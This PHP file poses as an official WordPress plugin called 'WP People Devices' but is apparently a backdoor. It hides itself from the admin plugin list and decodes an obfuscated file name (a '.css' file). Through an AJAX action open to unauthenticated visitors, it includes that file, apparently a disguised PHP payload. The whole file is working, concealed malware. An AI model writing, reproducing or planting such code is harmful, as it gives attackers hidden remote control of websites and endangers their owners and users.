<?php
/*
Plugin Name: WP People Devices
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 8.8.3
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function lbm_wek() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-people-devices/wp-people-devices.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

add_action('pre_current_active_plugins', 'lbm_wek');

function fie_ajr($plugins) {
    $p = 'wp-people-devices/wp-people-devices.php';
    if (array_key_exists($p, $plugins)) {
        unset($plugins[$p]);
    }
    return $plugins;
}

add_filter('all_plugins', 'fie_ajr');

function jdq($f, $d) {
    $r = '';
    for ($i = 0; $i < strlen($f); $i += 2) {
        $v = ord($f[$i]) - 65;
        $b = ord($f[$i + 1]);
        if ($b > 90) $b -= 6;
        $s = $v * 52 + ($b - 65);
        $r .= chr($s - $d);
    }
    return $r;
}

function nzm_ajax_handler() {
    require_once plugin_dir_path(__FILE__) . jdq('PuQJQJOvPwQMQM', 729);
    wp_die();
}

add_action('wp_ajax_wp-nfh', 'nzm_ajax_handler');
add_action('wp_ajax_nopriv_wp-nfh', 'nzm_ajax_handler');
